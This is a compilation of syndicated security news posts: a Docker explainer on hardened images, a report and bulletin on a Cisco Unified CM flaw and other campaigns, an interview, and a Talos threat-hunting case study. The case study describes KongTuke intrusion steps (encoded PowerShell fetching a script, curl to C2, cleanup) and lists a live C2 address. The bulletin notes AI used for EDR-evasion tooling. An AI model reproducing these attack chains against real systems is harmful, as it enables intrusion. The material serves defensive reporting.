Hardened Images Explained: Fewer CVEs, Smaller Attack Surface

When security teams scan their container environments for the first time, they often discover hundreds of known vulnerabilities, and almost none of them trace back to application code.

The overwhelming majority come from packages that shipped with the base image: shells, compilers, debug utilities, and libraries the application never calls. In a software supply chain built on containers, the base image is the foundation. If that foundation ships with unnecessary components, every workload built on top of it inherits the risk.

Hardened images address this problem at the source. They are purpose-built base images stripped down to only the runtime components an application needs, continuously patched, and shipped with verifiable metadata that lets security teams confirm exactly what is inside and how it was built.

Key takeaways

• Most container vulnerabilities come from unnecessary packages inherited from base images, not from application code.
• Hardened images strip out everything a containerized application does not need, reducing attack surface by up to 95%.
• Beyond minimization, hardened images include verifiable supply chain metadata: SBOMs, build provenance, and exploitability data.
• Container hardening differs from VM hardening; it focuses on image contents and build integrity, not OS-level configuration benchmark.

Why standard container images carry hidden risk

A general-purpose base image like a standard Linux distribution might ship with 400 or more installed packages. A typical containerized application uses 20 to 30 of them. The rest are inherited baggage: package managers, text editors, network diagnostic tools, documentation files, and libraries for use cases the container was never intended to serve.

Each of those unused packages is a potential attack surface. Vulnerability scanners flag them because they are genuinely present in the image, even if the application never imports or executes them. The result is a signal-to-noise problem that burns through security team capacity. When a team faces 200 findings and 80% of them exist in packages no running workload touches, the real vulnerabilities that need immediate attention get buried in triage.

The packages themselves are the other half of the problem. A shell in a production container gives an attacker an interactive environment to work from if they achieve initial access. A package manager lets them install additional tooling. Debug utilities help them map the network and identify lateral movement targets. None of these belong in a production container, but they ship by default in most general-purpose base images, quietly expanding the blast radius of any breach.

What makes a container image “hardened”

So what are hardened images in practice? Minimization gets the most attention, but it’s only one of three requirements. A genuinely hardened image is also continuously maintained and independently verifiable.

Quick definition: Hardened images are minimal, continuously patched base images that ship only the runtime components an application needs, paired with verifiable supply chain metadata like SBOMs, build provenance, and cryptographic signatures.

Minimized attack surface

The most visible characteristic of a hardened image is minimization. Shells, package managers, and debug tools are removed. Only the runtime components the application needs to function are included. This is more aggressive than simply choosing a slim base image variant. Hardened images are often rebuilt from the package level up, selecting each component deliberately rather than subtracting from a general-purpose distribution.

The result is a dramatically smaller CVE surface. Where a general-purpose image might carry hundreds of known vulnerabilities, a hardened equivalent for the same runtime typically carries single digits or none.

Continuous patching and rebuilds

A hardened image that’s never updated becomes a snapshot of the day it was built. An image hardened on Tuesday can start drifting by Friday: three upstream CVEs published, two library patches released, and the image is already accumulating the kind of exposure it was designed to prevent.

Security requires ongoing maintenance: monitoring upstream projects for fixes, rebuilding images to incorporate patches, and doing this on a defined cadence with clear SLAs. The best hardened images are rebuilt continuously, not on a quarterly or release-driven schedule. That’s what separates production-grade hardened images from one-time efforts to slim down a Dockerfile.

Verifiable supply chain metadata

This is where hardened images connect to the broader supply chain security best practices that organizations are adopting. A truly hardened image ships with:

• Software Bills of Materials (SBOMs) that list every package, version, and dependency in the image
• Build provenance attestations aligned to frameworks like SLSA, providing cryptographic proof of how and where the image was built
• Vulnerability Exploitability eXchange (VEX) data that identifies which CVEs present in the image are not exploitable given how the software is actually configured
• Cryptographic signatures that verify the image has not been tampered with between build and deployment

This metadata is what makes automated policy enforcement possible in CI/CD pipelines. A CI gate that blocks deployments unless the base image has a signed SBOM and valid provenance attestation is only feasible when the image provider builds that metadata into the supply chain from the start. For organizations operating in regulated environments, it’s also what allows security and compliance teams to verify an image without reverse-engineering its contents.

Container hardening vs. VM hardening

The term “hardened image” appears in both container and virtual machine contexts, but the two practices address different layers of the stack.

• VM hardening focuses on OS configuration: disabling unnecessary services, tightening firewall rules, restricting user permissions, and tuning kernel parameters. Defined by frameworks like CIS Linux Benchmarks. Takes a full operating system and locks it down.
• Container hardening operates at the image layer: what is packaged (minimization), how the image was assembled (provenance), and whether the contents are transparent (SBOMs and vulnerability data). Starts from a minimal foundation and builds up only what the application requires.

Both practices are valid and often coexist. Many organizations apply VM hardening to their container host nodes and container hardening to the images running on those nodes. They complement each other, but the techniques, tooling, and evaluation criteria are different. A CIS-hardened AMI and a hardened container base image solve distinct problems at distinct layers.

How to evaluate hardened images

Not all images marketed as hardened meet the same standards. When evaluating options, look for these characteristics:

• Transparency: Can you see every package in the image? Is there a complete, machine-readable SBOM?
• Provenance: Can you independently verify how and where the image was built? Are attestations signed and aligned to a recognized framework?
• Patch cadence: How quickly are upstream security fixes incorporated? Is there a defined SLA, or is patching best-effort?
• Compatibility: Do the images work as drop-in replacements in existing Dockerfiles and CI/CD pipelines, or do they require workflow changes?
• Vulnerability data integrity: Does the provider suppress or filter CVE data to make the image look cleaner, or do they publish full vulnerability transparency with exploitability context?

The answers to these questions separate genuinely hardened images from images that are simply minimal. Minimization is necessary but not sufficient. Without provenance, patching discipline, and transparency, a small image is just a smaller attack surface with less visibility.

What hardened images are not

The term “hardened” is sometimes applied loosely. Because of this, it’s worth clarifying what does not qualify, because each of these approaches solves part of the problem while leaving the rest exposed.

1. Choosing a slim or Alpine variant reduces image size, but it does not address provenance, patching cadence, or supply chain metadata. The image is smaller, not hardened.
2. Running a scanner and manually removing flagged packages produces a point-in-time fix, not a continuously maintained hardened image. The next upstream CVE puts you back where you started.
3. Building a distroless image from scratch achieves minimization but requires significant ongoing effort to maintain patch currency across every image in a portfolio. Without a defined rebuild cadence and verifiable metadata, the maintenance burden scales with the number of images.

Hardening, in the supply chain security sense, means all of these concerns are addressed systematically: the image is minimal, maintained, and verifiable.

Getting started with hardened images

Hardened container images are becoming the standard foundation for secure container deployments. They address the root cause of most container vulnerability findings: unnecessary packages inherited from general-purpose base images. And with verifiable supply chain metadata, they give security teams the transparency and audit trail that modern compliance requirements demand.

Docker Hardened Images provide this foundation across several thousand images spanning runtimes, frameworks, databases, and infrastructure components. Every image ships with SBOMs, SLSA Build Level 3 provenance, VEX data, and cryptographic signatures. The Community tier is free and open under Apache 2.0 with no restrictions on use or redistribution.

Explore our full catalog of hardened images and start replacing your base images today.

Frequently asked questions

What is the difference between a hardened image and a minimal image?

A minimal image has fewer packages, but that’s only one dimension of hardening. A hardened image also includes continuous patching with defined SLAs, verifiable build provenance, complete SBOMs, and vulnerability exploitability data. Minimization reduces the attack surface; hardening ensures the remaining surface is maintained, transparent, and verifiable.

Do hardened images work with existing CI/CD pipelines?

Well-designed hardened images are built to serve as drop-in replacements for standard base images. If your Dockerfile starts with a general-purpose runtime image, you can typically swap in a hardened equivalent without changing your build process. The key consideration is shell access: some hardened images remove shells entirely, which means build steps that rely on shell commands may need adjustment for multi-stage builds.

How do hardened images reduce CVE counts?

Every package in a container image is a potential source of CVEs. By removing packages the application does not need, hardened images eliminate the vulnerabilities those packages carry. A general-purpose base image with 400 packages might have 200 known CVEs. A hardened equivalent with 30 packages might have fewer than 5, because the vast majority of vulnerable components were never included. This significantly shrinks the surface an attacker can target and reduces the triage burden on security teams.

from Docker https://ift.tt/oL4QOEJ
via IFTTT

Cisco Patches CVE-2026-20230 in Unified CM as Exploit Code Goes Public

Cisco has patched a bug in Unified Communications Manager that lets an unauthenticated attacker on the network write files to the box and, from there, climb to root.

It is tracked as CVE-2026-20230, and proof-of-concept exploit code is already public. Cisco's PSIRT says it has not seen the flaw used in attacks yet. The PoC shortens that runway.

The flaw is a server-side request forgery. Unified CM and its Session Management Edition fail to validate certain HTTP requests properly, so a crafted request can push the server into writing arbitrary files onto the underlying OS. Those files are the foothold. Cisco says they can be used later to escalate to root, the top privilege on the system.

That two-step is why the score and the rating disagree. The CVSS base is 8.6: it scores the file write (an integrity-only impact, no confidentiality or availability loss) but not the root escalation that follows. Cisco rated the advisory Critical anyway, since the end state is full root.

There is one mitigating factor: the flaw only works when the WebDialer service is running, and WebDialer ships off by default. That does not help any deployment that has switched it on.

To check, open Cisco Unified CM Administration and switch to Cisco Unified Serviceability. Under Tools > Control Center - Feature Services, look at the Cisco WebDialer Web Service status in the CTI Services section. Started means you are exposed.

Patching is the only real fix. For the 14 train, that is 14SU6. For 15, the full Service Update (15SU5) is not due until September 2026, so until then, you are on the interim COP patch, or you turn WebDialer off (uncheck it under Tools > Service Activation and save). An independent researcher working with SSD Secure Disclosure reported the bug.

Unified CM has been a steady source of unauthenticated, root-level trouble. Last July, Cisco pulled a hard-coded root SSH account left in from development (CVE-2025-20309, CVSS 10).

In January, it patched an unauthenticated RCE across several of its voice products (CVE-2026-20045) that was already being exploited in the wild, enough for CISA to add it to its known-exploited list.

This one fits the pattern: a request that should never have reached anything sensitive, reaching it. With a PoC public and the 15-train fix months out, assume someone turns that file-write into a working attack before the patches are everywhere.

from The Hacker News https://ift.tt/NrjP0oH
via IFTTT

ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories

It got stupid again.

The internet still feels held together with tape. Bad plugins, old bugs, fake tools, trusted apps doing shady things. Same mess, new wrapper. And now the weird stuff is normal. Forums go down and come back worse. Cheap hackers get better toys. AI starts breaking real systems. Great.

Read the whole thing before it ruins your week anyway.

1. Unauthenticated SSRF risk

   Cisco has released fixes to address a high-severity security flaw in Unified Communications Manager (CVE-2026-20230, CVSS score: 8.6) that could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. "This vulnerability is due to improper input validation for specific HTTP requests," Cisco said. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root." The issue has been addressed in Cisco Unified CM and Unified CM SME Release versions 14SU6 and 15SU5. Cisco said it's aware of the availability of proof-of-concept exploit code for the flaw, but noted there is no evidence of active exploitation. It credited an independent security researcher working with SSD Secure Disclosure for reporting the vulnerability.

2. Mobile spyware operation

   Russia's Federal Security Service (FSB) has disclosed details of what it described as a "large-scale action" undertaken by foreign intelligence services to stealthily implant spyware on the mobile devices of high-ranking officials in the country. "This software was utilized to exfiltrate existing data, intercept ongoing conversations, and conduct covert audio and video surveillance of the immediate surroundings of the electronic devices, with the ultimate objective of obtaining sensitive information," the FSB said. Russia did not reveal who was behind the attacks, but noted the "representatives of foreign intelligence services" leveraged the technical capabilities of major international IT corporations to exfiltrate sensitive data from the devices. This specifically included the exploitation of mobile communication channels, the agency added. An investigation into the activity is ongoing, with the FSB also initiating a criminal case to investigate the matter.

3. Layered keylogger lures

   Threat actors have been relying on social engineering over the past few months to push VIP Keylogger via loaders written in JavaScript, batch scripts, and Visual Basic Script (VBS). "Attackers are masquerading as legitimate business communications such as bank payment notifications, procurement orders, and logistics updates to lure users into opening malicious files," Splunk said.

4. Crypto sanctions escalation

   The U.S. Treasury's Office of Foreign Assets Control (OFAC) has announced sanctions against Nobitex, Iran's largest cryptocurrency exchange, for facilitating payments related to terrorist activities. "Nobitex has provided significant support to the regime, processing more than 50 percent of all Iranian digital asset inflows in 2025 and facilitating payments tied to Iran's terrorist activities, sanctions evasion efforts, and Islamic Revolutionary Guard Corps (IRGC)-linked transactions, including activity associated with IRGC-affiliated ransomware actors," the Treasury said. The sanctions also extend to Nobitex's chairman, co-founder, and former CEO, Amir Hossein Rad, as well as other Nobitex leaders and officials, and three other exchanges: Wallex, Bitpin, and Ramzinex. According to Chainalysis, Nobitex processed over 50% of all Iranian digital asset inflows last year. The four exchanges accounted for roughly $7.7 billion, 78% of Iran's USD 9.9 billion in attributed 2025 crypto volume, per TRM Labs.

5. Cybercrime forum fallout

   The July 2025 law enforcement takedown of XSS, a prominent Russian-speaking cybercrime forum, didn't dismantle the ecosystem. Rather, it fractured it into competing, harder-to-track factions, Flashpoint said. The collapse has triggered an exodus into new, unvetted, and often adversarial communities. Some of the new forums that have rushed to fill up the void left by XSS include DamageLib (launched by legacy moderators of XSS), Rehub (launched by another former XSS moderator), XSS.pro (a resurrection using old backups and suspected to be a law-enforcement honeypot), and XSSF (started by a pro-Russian Telegram hacking group).

6. RMM abuse surge

   A lesser-known remote desktop tool called Tiflux is being used in a growing number of attacks to establish persistence, transmit screenshots, and run commands to collect system profiling information. "Threat actors behind the rogue Tiflux incidents also installed UltraVNC, an open-source remote access tool, sideloaded other commercial RMMs, including Splashtop and ScreenConnect, and installed an outdated driver that can permit the threat actor to elevate their own privileges on an infected system," Huntress said. "Threat actors continue to test and weaponize the use of commercial remote access management tools."

7. Malware delivery network

   A threat cluster tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates (aka SocGholish) social engineering techniques on compromised sites. Thousands of websites are estimated to have been compromised, directing users to malicious infrastructure. DriveSurge primarily acts as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors of compromised websites are steered through a traffic distribution system (TDS) known as zTDS, which profiles the system and decides whether the visitor should be served a ClickFix or a FakeUpdates lure. zTDS, in use since at least 2015, is publicly available at ztds[.]info. "Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," Silent Push said. The campaign has been active since September 2025.

8. Sensitive data leak

   The Spanish National Police has arrested an unidentified individual for leaking sensitive information related to members of various critical state organizations, including the National Cybersecurity Institute (INCIBE), the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council.

9. JavaScript backdoor malspam

   Intrinsec haș disclosed that multiple malspam campaigns have been used to distribute a JavaScript-coded backdoor. "The targets of those campaigns were from all regions and sectors, notably energy and finance ministries, including in the CIS region," the company said. "We believe the campaigns to be financially motivated and operated for email account compromise (EAC) and/or business email compromise (BEC)." The activity was observed in March 2026.

10. On-chain malware delivery

    Cybersecurity researchers have flagged an intrusion in which threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. "The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer, alongside an on-chain execution tracker that confirmed each victim compromise in real time," Trend Micro said.

11. Cloud attack tradecraft

    Nation-state hacking groups like APT29, APT33, and UTA0355 are exploiting ROADtools, a Python-based open-source framework for red-teaming and research, to blend in with normal traffic and evade detection. "ROADtools operates through legitimate Microsoft APIs and can mimic typical traffic," Palo Alto Networks Unit 42 said. "Further defense evasion can be achieved by configuring request attributes such as user-agent strings. These capabilities have made ROADtools a valuable asset for attackers. Nation-state threat actors have used it in recent cloud intrusions for discovery, persistence, and defense evasion. Attackers involved in a targeted phishing campaign in early 2025 used tooling that matches ROADtools' token management capabilities."

12. Data-only extortion rises

    Pure data-exfiltration campaigns without deploying ransomware to pressurize victims are on the rise. In 2025, such attacks have primarily targeted professional services, healthcare, and consumer services firms. "Interestingly, while manufacturing remains the single most disrupted sector overall, construction has witnessed a 44% year-over-year increase as a data-only extortion hotspot," Unit 42 said. "These firms are attractive targets due to lucrative financial blueprints and bidding data combined with data egress controls."

13. AI-assisted evasion testing

    An unknown threat actor has been observed using artificial intelligence (AI) technologies to automate Active Directory discovery and refine endpoint detection and response (EDR) evasion tactics in a red team post-exploitation framework. "Analysis revealed that AI for malware development was more limited and was mainly used to coordinate workflows and support experimentation," Sophos said. "The actual EDR-bypass path was a structured engineering test cycle that included human review and iteration." To develop tools for bypassing EDR agents, the attacker is said to have used Cursor and Anthropic Claude Opus. At the core of the framework is a Python tool that generates Go and Rust payloads for testing with an aim to resist sandboxing, antivirus, and EDR detection. This approach was used to build nearly 80 modules covering more than 70 techniques. Also attributed to the threat actor are Python-based malware development scripts for injecting shellcode into legitimate Windows executables and a Telegram bot API-based external command and control (C2) mechanism. "The use of AI agents to accelerate tool development and test evasion techniques lowers the barrier to entry for sophisticated red team-style attacks," Sophos said. "However, this shift does not change how defenders should protect themselves." The framework is said to be built for stealthy post-exploitation activity in target environments, linking it to "known ransomware deployment and data theft operations."

14. Steam-hosted malware payloads

    A newly identified malware is using Steam Community profile comments to host malicious payloads for WordPress, hiding malicious infrastructure behind Valve's legitimate platform. "The malware employs invisible Unicode characters to conceal payloads within Steam profile comments, enabling steganographic data encoding that evades traditional text-based detection methods," GoDaddy said. "A cookie-authenticated backdoor enables remote code execution, allowing attackers to modify plugin and theme files by sending base64-encoded PHP code via POST requests." The malware performs two primary functions, including client-side JavaScript injection, which fetches encoded URLs from Steam profile comments, decodes them, and injects external JavaScript into WordPress pages, and a server-side backdoor that provides cookie-authenticated remote access for modifying PHP files across plugins and themes. The campaign was first detected in July 2025. The malware has been detected on approximately 1,980 WordPress sites. It is unclear how the websites are breached, but it's assessed that the initial infection vector could be stolen admin logins, compromised FTP/SFTP credentials, the exploitation of a vulnerable WordPress theme or plugin, or a supply chain compromise.

15. Trusted tools abused

    Flare.io has disclosed details of FalkonC2, a commercial hacking tool that appears designed to hide inside enterprise environments by abusing trusted remote access software. "FalkonC2 has an enterprise version called Rotemelli2 that runs in memory, rotates its command-and-control domains every 72 hours, and uses tools such as ScreenConnect, Datto, and SimpleHelp to quietly launch attacks," the company said in a statement. An analysis of dashboard telemetry suggests active enterprise infections across the U.S., Australia, the Netherlands, and Poland. The framework also checks infected machines for QuickBooks and Sage50 data, suggesting attackers are looking for accounting systems they can quickly exfiltrate.

16. AI vulnerability surge

    Anthropic is broadening access to its Project Glasswing program, adding approximately 150 organizations in 15 countries for access to its Claude Mythos Preview. "The bottleneck in cybersecurity is now verifying, disclosing, and patching the large numbers of vulnerabilities that Mythos-class models can surface," the company said. The growing number of flaws identified with the help of AI models has shifted the scales from discovery to patching. A recent report from the Cloud Security Alliance (CSA), the SANS Institute, and the Open Worldwide Application Security Project (OWASP) concluded that in the near term, organizations are "likely to be overwhelmed" by threat actors using AI to find and exploit vulnerabilities faster than defenders can patch them. "The cost and capability floor to exploit discovery is dropping, the time between disclosure and weaponization is compressing toward zero, and capabilities that previously required nation-state resources are now becoming broadly accessible," the report said.

17. Linux flaw under attack

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a Linux Kernel flaw (CVE-2022-0492, CVSS score: 7.8) to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaw by June 5, 2026. "Linux Kernel contains an improper authentication vulnerability which could allow for privilege escalation via the cgroups v1 release_agent feature," CISA said. The development comes after Kaspersky said it observed the flaw, along with CVE-2019-5736 and CVE-2024-21626, being exploited in attacks aimed at container environments.

18. Fake image tools deliver malware

    A new ClickFix-style lure is being dressed up as free image-editing tools to deliver CastleLoader, which then drops both NetSupport RAT and a custom .NET stealer called CastleStealer. "The sites look like every other 'remove your photo background' service with uploads, progress bars, and download buttons, but the entire UI is fake," Huntress said. The activity has been codenamed BackgroundFix. CastleLoader is attributed to a threat cluster known as GrayBravo.

19. Session theft defense

    Google has revealed that Device Bound Session Credentials (DBSC) in the Chrome browser is now generally available and enabled by default for Google Workspace users. "DBSC strengthens account security after users are logged in and helps bind a session cookie - small files used by websites to remember user information - to the device a user authenticated from," Google said. "Even if malware was present on the user's device, DBSC reduces the risk of session theft and makes it meaningfully more difficult for malicious actors to exploit stolen session cookies." The feature was formally released in April 2026.

20. Adobe abused in phishing

    Cybercriminals are weaponizing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward. Opening an HTML attachment in the email message serves a login form urging the recipient to enter their credentials. The captured information is delivered to the domain "lnkd.tt.omtrdc[.]net/rest/v1/delivery," after which they are redirected to the LinkedIn site. "This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform," Malwarebytes said. "But the campaign isn't using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect/abuse point in the phishing flow."

21. Supply chain delay defense

    RubyGems has included a cooldown, a time-based filter, in Bundler version 4.0.13 that refuses to resolve to a version until it has been public for at least "N" days. "Releases too new to have been scrutinized are passed over in favor of ones that have aged past the window," Hiroshi Shibata, RubyGems maintainer, said. "It is opt-in, and complements rather than replaces existing defenses like mandatory 2FA and trusted publishing." Users can declare a "small cooldown" on the source in the Gemfile. The efforts go along with other initiatives like AI-assisted vulnerability scanning against the most critical gems in the registry.

22. Iran-linked Israel attacks

    ESET said it recorded an unusual spike in Iran-aligned activity against Israeli targets between October 2025 and March 2026 that could not be linked to previously known groups. "Two unattributed activity clusters, Rusty Boots and MoKhargosh, demonstrated both espionage capabilities and destructive potential - including deployment of a bootkit-style wiper and retaining destructive tooling for later use - whereas a third, MOØN Badr, appears to have been limited to targeted espionage," the Slovakian company said. MoKhargosh, first observed in January 2026, used Go-compiled binaries in attacks targeting Israel. This includes a backdoor called GoKhargosh, along with wipers, filecoders that overwrite files with junk data, and a wiper that targets the master boot record to render the system unbootable. MOØN Badr, on the other hand, singled out three unidentified victims in Israel in early January 2026 to deliver the MOØN AGENT backdoor via phishing emails to facilitate command execution and file uploads and downloads.

23. Fuel tank systems exposed

    The U.S. government has issued an advisory urging organizations to take steps to defend against attacks targeting U.S.-based automatic tank gauge (ATG) systems by securing them with strong passwords and by removing them from the internet to reduce public exposure. The activity, which remains unattributed, involves the attackers compromising internet-exposed ATG systems via hard-coded credentials, command execution, and SQL injection vectors, followed by escalating privileges to obtain full administrator rights and modifying the system functions. "Should a cyber threat actor exploit these vulnerabilities and compromise an ATG system, they could disrupt or manipulate the below critical functions by interfacing directly with the tank management as though they possessed legitimate physical access to the system console," government agencies said.

24. Verified call defense

    Google has announced a fake call detection feature, built on Rich Communication Services (RCS), to Android devices running versions Android 12 and later that verifies whether a call is coming from the caller's actual Android smartphone. Enabled by default, the alert is designed to avoid falling victim to deepfake impersonation and call spoofing in real time. "When a contact calls you and you're both using Phone by Google, their device sends a silent confirmation signal in real time to your device to verify the call is legitimate and truly coming from the contact's device," Google said. "If a scammer tries to impersonate your contact, that initial confirmation signal will be missing. Your device will instantly notice this and ping your contact's actual device to double-check. If their real device says, 'I'm not making a call right now,' you'll get a warning on your screen advising you to hang up immediately." Because the digital handshake uses end-to-end encrypted RCS technology, Google said the process is completely private. That said, the feature requires users to have three Google apps installed: Phone by Google, Contacts, and Google Messages. It will roll out globally this month, starting with Pixel devices.

25. Agentic AI failures

    An analysis of 7,200 publicly reported AI-security and operational incidents has identified "344 verified enterprise-relevant agent-inflicted damage cases between September 2023 and May 2026, including 188 incidents where autonomous AI systems caused direct organizational harm without any external attacker involvement," Cyera researchers Ehud Halamish, Assaf Morag, and Vladimir Tokarev said. "The majority of confirmed incidents involved real production impact rather than theoretical AI risk scenarios. Observed outcomes included deleted databases, destructive cloud actions, unauthorized financial operations, runaway API spending, service outages, exposed secrets, and silent integrity corruption inside enterprise environments. As agents gain broader permissions and deeper integration into SaaS, cloud, development, and business environments, the AI interaction layer itself increasingly becomes part of the enterprise attack surface and critical data perimeter."

The lesson is boring because the lesson is always boring. Patch faster, kill exposed admin panels, stop trusting "safe" tools by name, and watch the weird edges where attackers like to hide. The cheap stuff still works because too many teams leave it cheap.

Security is not magic. It is inventory, logs, least privilege, backups, tested restores, and people who notice when something normal starts acting wrong. Do that well, and half this mess gets a lot less exciting. That is the point.

from The Hacker News https://ift.tt/VCOF57a
via IFTTT

Winning the cyber marathon with Tony Giandomenico

In the high-speed world of cybersecurity, the difference between a breach and a breakthrough often comes down to endurance. Tony Giandomenico, Senior Director of Product Management with Cisco Talos, joins me to discuss how he balances the intensity of leading major product launches with the grueling discipline of Ironman triathlons.

Beyond the technical specs and new threat hunting features, this conversation dives deep into the human side of leadership. Tony shares his hard-won lessons on the power of communication, the importance of knowing your "why," and how to navigate the complexities of a 30-year career without losing your focus.

Amy Ciminnisi: You have been in the thick of the cyber security world for a while now, and a lot of things have shifted in this field. So what has been the biggest surprise for you, and what keeps you excited about leading the charge on the product side?

Tony Giandomenico: Well, I would probably say that the biggest shift over the last six months has been the increase rate of the capabilities of these frontier models. I'm the first one not to jump on the bandwagon of this stuff, because I've been doing this for about 30 plus years or so, but I think this feels a little different. The capabilities are increasing, and I think what that means to cybersecurity is a big shift. How do we deal with all that? From the adversary side, they're actually breaking in the networks like they typically do. They're moving laterally within the environment. They're evading different types of security controls. Finding vulnerabilities, exploiting those vulnerabilities, all of that stuff.

It's also going to be supercharged on the defensive side. Of course, you don't bring a knife to a gun fight, right? You're going to use the same AI technology — you know, the same frontier models — to speed things up there as well. From the product management side, I think we're going to see the things that we would have previously seen five years down the road a lot sooner. And that's kind of that's what kind of excites me about everything — that opportunity to explore the art of possibility is a lot more at your fingertips where it wasn't necessarily before.

AC: We specifically lined this episode up with the Cisco Talos Threat Hunting launch, which you played a major role in. For people who aren't familiar, can you explain what it is?

TG: Threat hunting is where we're looking for different types of threats that are circumventing our existing security control alerts, detection mechanisms, and so on. When defenders invest in these different types of technologies that are automatically detecting alerts or threats in your environment, the challenge that they have is the sensitivity meter. If they set it to be too high, the team might get inundated with false positives, and then that particular product isn't really worth that investment because you're constantly have to investigate those. So the sensitivity meter has to find some place in the middle. That's where it gives these stealthy threat actors a place to live. So you have a combination of AI and human-in-the-loop services, where we build hypotheses to identify actors that may have actually already circumvented your security controls.

Currently, we're hunting in the endpoint telemetry side (e.g., Secure Endpoint) that we offer our customers today. With this expansion, we're expanding it out to our flagship firewall product. So we'll be hunting within Secure Firewall as well as identity, which actually includes Duo and CII, which is Cisco Identity Intelligence.

AC: How do you keep your cool and stay focused on the why behind the work when you're dealing with the intensity of a major launch?

TG: Before coming to Cisco, I had a small cybersecurity consulting company for about 10 years or so out in the Hawaiian Islands. I had the domain expertise, but I had to learn financial aspects, sales, and marketing. I also had to understand what makes people tick. I wasn't able to talk to every individual the same way to get them on board with things. So the biggest thing that I took away when I went from running my business to working in a larger organization was that when folks are in different departments, there are competing priorities and I have to influence them. I have to get them to understand and believe in the vision. So if you go in there with that mindset, knowing that it's not going to flow exactly how you envisioned, things just work out.

---

Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.

from Cisco Talos Blog https://ift.tt/nK4txCd
via IFTTT

Hypotheses, telemetry, and human judgment: Inside Cisco Talos Threat Hunting

By Ron Scott-Adams

Most security tools operate on a simple principle: If a known-bad pattern appears, fire an alert. This works well enough for many threats, but it fails against adversaries who closely study detection thresholds and deliberately stay under them. 

Cisco Talos Threat Hunting operates on a different principle. Instead of waiting until we’re sure we can cross an alerting threshold, we start with a hypothesis about what specific adversary behavior would look like in the telemetry, and then search for it. Using both AI and human-driven processes, including pioneering hunts built from Talos’ latest threat research, we continuously search for threats that traditional detection misses.

These hunts operate at the leading edge of our intelligence, where patterns are compelling but require expert judgment to distinguish from benign activity. Talos threat analysts provide this judgement to ensure maximum fidelity for your threat landscape. 

This post covers how that works in practice.

Hypothesis-driven hunting vs. alert-driven detection 

A detection rule says, "If X happens, alert." A hunt hypothesis says, "Given this specific threat actor uses these specific techniques, what would those techniques look like in this specific telemetry source?" 

The distinction matters because it inverts the workflow. Detection requires prior knowledge encoded into a rule. Hunting requires only a plausible theory about adversary behavior and the telemetry to test it against. 

Our hypotheses come from multiple sources: active threat intelligence on adversary tradecraft, findings from Cisco Talos Incident Response engagements, and patterns observed across global telemetry from nearly 50 million sensors. When Talos sees a new technique in the wild, we can build a hunt for it before a detection signature exists.

Here are a few examples of these threat hunts:

• Python User-Agent connections to malicious ASN infrastructure. Legitimate Python HTTP requests exist in most environments, but Python calling out to hosting providers with poor reputation scores is a different signal entirely. 
• MSIEXEC User-Agent making connections to suspicious or malicious ASNs. MSIEXEC fetching remote packages is a known living-off-the-land (LOTL) technique. The user-agent string persists in firewall connection logs even when the payload itself is encrypted. 
• Domain generation algorithm (DGA) detection via AI/ML. Algorithmically generated domains have statistical properties (character distribution, entropy, n-gram frequency) that distinguish them from human-registered domains. Our models flag DNS queries that match these patterns. 
• Connections to EVILEMPIRE ASN ranges. Certain autonomous systems have a long, documented history of hosting command-and-control (C2) infrastructure. Outbound connections to these ranges warrant investigation regardless of the specific destination IP. 
• User-Agent and application outliers. Baseline what's normal for an environment, then surface what deviates. A curl binary running on a finance team's workstation at 2am is not the same signal as curl running in a CI/CD pipeline. 
• Endpoint detection and response (EDR) research findings correlated with network indicators of compromise (IOCs). When endpoint telemetry reveals a new threat, the associated network indicators become hunt targets across firewall data for all customers.

Each of these hunts runs continuously. The AI engine executes them at scale, 24 hours a day, across all enrolled customer environments. It surfaces candidates. Then a human analyst investigates.

Case study: KongTuke C2 discovery through multi-domain correlation 

The value of correlating telemetry across security domains is easiest to explain with a real example. During a recent engagement with a customer, Talos analysts identified active KongTuke C2 activity by combining firewall and endpoint data in a way that neither source could have accomplished alone. This is the kind of continual awareness we are seeking to bring to customers everywhere with Talos Threat Hunting.

What the firewall showed 

Cisco Secure Firewall telemetry recorded outbound ConnectionEvents to “144.31.221.82” on port 6060, with a URL path of /capcha9856. This pattern is consistent with a Traffic Direction System (TDS) infection, where a compromised website redirects visitors through a chain of intermediate servers before landing on a malicious payload host. 

The firewall gave us the "what" and "when" — a specific device was reaching out to known-bad infrastructure at a known time. But the firewall alone could not tell us how the connection was initiated or what happened next on the host.

What EDR added 

Pivoting to Cisco Secure Endpoint data for the same DeviceIP, we pulled the full process history around the time of the connection. The endpoint telemetry revealed:

1. A cmd.exe process spawning powershell.exe with an -EncodedCommand parameter containing a Base64-encoded payload 
2. The decoded payload executing Invoke-WebRequest to fetch a file named script.ps1, dropping it into the user's ApplicationData directory 
3. A separate curl.exe process making requests to the same C2 infrastructure the firewall had flagged 
4. Post-execution cleanup via Remove-Item, attempting to delete traces of the downloaded script

Why neither source alone was sufficient 

The firewall saw an outbound connection to a suspicious IP. That's useful, but not conclusive on its own. Hundreds of legitimate services might generate similar connection patterns. The EDR saw obfuscated PowerShell execution. That's suspicious, but without the network context confirming the destination was a known C2 server, it could be a false positive from an overzealous admin script. 

Together, they told a complete story: initial compromise via TDS redirect, payload delivery through encoded PowerShell, C2 communication confirmed by both endpoint process tree and network connection logs, and active evidence of anti-forensics (file cleanup). This is a confirmed intrusion with clear remediation steps, not an ambiguous alert requiring hours of analyst triage. 

Broader sweep 

